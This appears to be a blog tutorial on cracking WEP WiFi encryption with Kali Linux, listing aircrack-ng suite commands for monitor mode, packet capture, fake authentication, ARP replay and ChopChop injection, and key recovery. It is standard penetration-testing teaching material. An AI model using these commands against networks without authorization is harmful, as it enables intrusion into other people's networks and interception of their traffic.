Penetration Testing, WiFi

WEP WiFi PenTest with Kali Linux

Kali Linux
Start your Kali Linux virtual machine.

Wireless adapter

Plugin your wireless adapter. (see Wireless Adapters suitable for WiFi pen-test).

Disconnect
Disconnect from all wireless networks.

Enable monitor mode on wireless interface

List wireless interfaces supporting monitor mode

airmon-ng

Enable monitor mode

airmon-ng start wlan0

Scan for WiFi networks

airodump-ng wlan0mon

Target Network
Spot your target network in the list and note down BSSID, Channel and ESSID.

Packet Capture

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

-c channel to listen to.
–bssid show networks, matching the given bssid.
-w the dump file prefix to use

Speed up the IV’s
Leave the airodump-ng running.

Fake authentication attack
Open a new terminal window:

aireplay-ng -1 0 -e [essid] -a [bssid] [monitor interface]

-1 0sec delay
-e access point router’s ESSID
-a access point router’s BSSID

or for picky access points:

aireplay-ng -1 5000 -o 1 -q 10 -e [essid] -a [bssid] [monitor interface]

-o Fake Authentication attack: Set the number of packets for every authentication and association attempt.
-q Fake Authentication attack: Set the time between keep-alive packets.

ARP request reply attack
Open a new terminal window:

aireplay-ng -3 -b [bssid] [monitor interface]

ChopChop attack
Open a new terminal window:

aireplay-ng -4 -b [bssid] [monitor interface]

Cracking/Obtain the WEP key

aircrack-ng -a1 -b [router bssid] /root/Desktop/*.cap

-a attack mode, 1 for WEP, 2 for WPA/WPA2
-b access point router’s BSSID